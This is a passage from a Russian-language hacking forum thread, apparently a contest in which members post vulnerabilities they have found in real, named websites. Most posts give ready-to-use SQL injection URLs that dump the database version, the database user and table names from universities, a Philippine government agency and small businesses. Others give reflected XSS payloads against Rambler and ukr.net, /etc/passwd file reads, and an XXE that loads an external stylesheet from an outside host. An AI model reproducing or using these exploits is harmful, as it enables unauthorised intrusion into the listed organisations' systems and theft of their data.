HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 23.07.2015, 15:52
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами: 5713526

Репутация: 145
По умолчанию

target:http://som.adzu.edu.ph

type:SQL Injection

version:10.0.20-MariaDB-log

user:som@localhost

Код:
http://som.adzu.edu.ph/newsupdates/index.php?id=-1+union+select+1,version(),table_name,user(),5,6+from+information_schema.tables+--+


target:http://www.bulsu.edu.ph

type:SQL Injection

version:5.1.63-community-log

user:bulsued_friedel@207.198.102.22

Код:
http://www.bulsu.edu.ph/footer.php?id=-2 UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES


target:http://www.ntc.gov.ph

type:SQL Injection

version:10.0.15-MariaDB

user:root@localhost

Код:
http://www.ntc.gov.ph/announcements_news.php?id=-24+union+select+1,version(),user(),4,table_name,6,7+from+information_schema.tables+--+
target:http://www.irishsanghatrust.ie

type:SQL Injection

version:5.0.83-community

user:u1094094_sangha@172.16.5.126

Код:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version(),user(),4,5,6,7,table_name,9,10,11,12,13,141,15,16,17,18+from+information_schema.tables+--+
target:http://www.mtzwear.com

type:SQL Injection

version:5.5.10

user:mtzwear.com@localhost

Код:
http://www.mtzwear.com/eng/art_catalogo.php?id=-43 union select 1,2,3,4,5,6,7,8,table_name,user(),11 from information_schema.tables

 
Ответить с цитированием

  #62  
Старый 24.07.2015, 07:03
user6334
Участник форума
Регистрация: 29.06.2015
Сообщений: 296
С нами: 5723606

Репутация: 12
По умолчанию

Site: http://www.packsend.co.uk

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.packsend.co.uk/news.php?n=-1+UNION+SELECT+1,2,user(),4,5,6,7,8+--+
 
Ответить с цитированием

  #63  
Старый 26.07.2015, 01:34
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами: 5713526

Репутация: 145
По умолчанию

target: http://www.romanianwriters.ro

type: SQL Injection

version: 5.1.61-0ubuntu0.10.10.1

user: romanian_rowri@localhost


Код:
http://www.romanianwriters.ro/s.php?id=-1'+UNION+select+1,convert(table_name using latin1),3+from+information_schema.tables+limit+1,1+--+


target: http://www.bransonparksandrecreation.com

type: SQL Injection

version: 5.0.96-log1

user: bransonparks@173.201.216.51


Код:
http://www.bransonparksandrecreation.com/page.php?id=74 and(select 1 from(select count(*),concat((select (select concat(table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1+--+
target: http://www.microtekusa.com/

type: SQL Injection

version: 5.0.77

user: root@localhost


Код:
http://www.microtekusa.com/products.php?KindID=3&ID=-34+union+select+1,2,3,4,5,6,version(),user(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,table_name,57,58,59,60,61,62,63,64,65,66+from+information_schema.tables+--+

 
Ответить с цитированием

  #64  
Старый 26.07.2015, 06:57
ocheretko
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами: 8417383

Репутация: 0
По умолчанию

Нашел на Рамблере XSS:

Код:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net

Код:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов

Код:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity

Код:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:

Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл

Код:
]>
И потом выводим на экран &passwd;

P.S. Извините, проверил топ-таблицу, оказывается я не первый
 
Ответить с цитированием

  #65  
Старый 31.07.2015, 15:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

таблицу обновил, всем добавил. прошу проверять на повторы: повторами считаются везде, где уязвимость выкладывали.

Цитата:
Сообщение от ocheretko  

Нашел на Рамблере XSS:
Код:
http://nova.rambler.ru/search?query=%3C%2Fa%3ELOL%3C%3E%3Cscript%3Ealert%28111%29%3B%3C%2Fscript%3E
http://nova.rambler.ru/search?query=%3C%2Fa%3E%3C%3E%3Csvg%20onload%3D%27prompt%28111%29%27%3E
Нашел на ukr.net
Код:
https://search.ukr.net/?q=%27%3Balert%28%2Fantichat%2F%29%3B+%2F%2F&cr=countryUA&lr=&as_qdr=&filter=&sitesearch=&safe=&related=&as_rq=&start=0
А также, Чтение локальных файлов
Код:
http://probe.bvs.br/cgi-bin/wxis1660.exe/?IsisScript=/etc/passwd
А также буду первым запостившим XML eXternal Entity
Код:
http://probe.bvs.br/transf.php?xml=news/3/1/20011213/2/body.xml&xsl=http://expdomain.esy.es/xml/my.xml
Так как про этот тип уязвимости мало известно, немного комментариев:
Уязвимость основана на трансформации xml - подключении внешней сущности. В xml файле сперва мы определяем сущность, которая например читает локальный файл
Код:
]>
И потом выводим на экран
&passwd;
P.S. Извините, проверил топ-таблицу, оказывается я не первый
вы первый. я себе XXE написал для примера, а вам добавил. хорошая работа
 
Ответить с цитированием

  #66  
Старый 04.08.2015, 02:16
3nvY
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами: 5753846

Репутация: 11
По умолчанию

Сайт: http://ww2.odu.edu

Уязвимость: LFR

Эксплоит:

Код:
http://ww2.odu.edu/ao/facultyhandbook/index.php?page=../index.php
В исходниках страницы видно PHP код. Только это мало что даёт, по крайней мере для меня.
 
Ответить с цитированием

  #67  
Старый 04.08.2015, 15:06
joelblack
Участник форума
Регистрация: 06.07.2015
Сообщений: 240
С нами: 5713526

Репутация: 145
По умолчанию

target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost

Код:
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


Код:
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST

Код:
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
target: http://www.qbele.com.br

type: SQL Injection

version: 5.1.73-rel14.11-log

user: site1371378569@186.202.153.159

Код:
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

 
Ответить с цитированием

  #68  
Старый 07.08.2015, 13:18
blud_niy
Новичок
Регистрация: 26.07.2015
Сообщений: 8
С нами: 5684726

Репутация: 0
По умолчанию

Site: http://www.gorodokboxing.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site: http://www.malnaditimudigere.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site: http://glamdring.baac.or.th

Уязвимость: SQL Injection

Эксплоит:

Код:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site: http://web-sayansk.net

Уязвимость: SQL Injection

Эксплоит:

Код:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site: http://www.replacement-windows.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
Site: http://www.bellebuddy.com

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site: http://www.babilon-nyelvstudio.hu

Уязвимость: SQL Injection

Эксплоит:

Код:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
 
Ответить с цитированием

  #69  
Старый 12.08.2015, 15:14
blud_niy
Новичок
Регистрация: 26.07.2015
Сообщений: 8
С нами: 5684726

Репутация: 0
По умолчанию

подскажите... а что, конкурс уже завершился?
 
Ответить с цитированием

  #70  
Старый 12.08.2015, 15:33
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от blud_niy  

подскажите... а что, конкурс уже завершился?
нет, добавляю по возможности
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.